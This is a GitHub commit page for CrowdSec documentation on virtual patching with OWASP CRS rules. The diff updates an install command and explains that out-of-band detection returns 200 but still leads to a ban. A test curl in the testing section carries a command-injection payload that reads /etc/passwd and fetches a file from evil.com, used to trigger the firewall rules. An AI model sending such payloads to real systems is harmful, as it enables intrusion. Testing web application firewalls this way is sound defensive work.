Skip to content

Commit f94d635

Browse files
committed
quick up
1 parent 79c8203 commit f94d635

File tree

1 file changed

+3
-1
lines changed

1 file changed

+3
-1
lines changed

crowdsec-docs/docs/appsec/vpatch_crs.md

Lines changed: 3 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -20,7 +20,7 @@ Install both the virtual patching and CRS collections:
2020

2121
```bash
2222
# Install virtual patching rules (in-band blocking)
23-
cscli collections install crowdsecurity/appsec-virtual-patching
23+
cscli collections install crowdsecurity/appsec-virtual-patching crowdsecurity/appsec-generic-rules
2424

2525
# Install OWASP CRS rules (out-of-band detection + scenario)
2626
cscli collections install crowdsecurity/appsec-crs
@@ -119,6 +119,8 @@ curl -I ${TARGET}'/.env'
119119

120120
## Testing - OWASP CRS
121121

122+
When OWASP CRS are loaded in out-of-band, those requests will return 200, but the IP will ultimately get banned.
123+
122124
```bash
123125
TARGET=localhost
124126
curl -I ${TARGET}'/?x=A";cat+/etc/passwd;wget+http://evil.com/payload'

0 commit comments

Comments
 (0)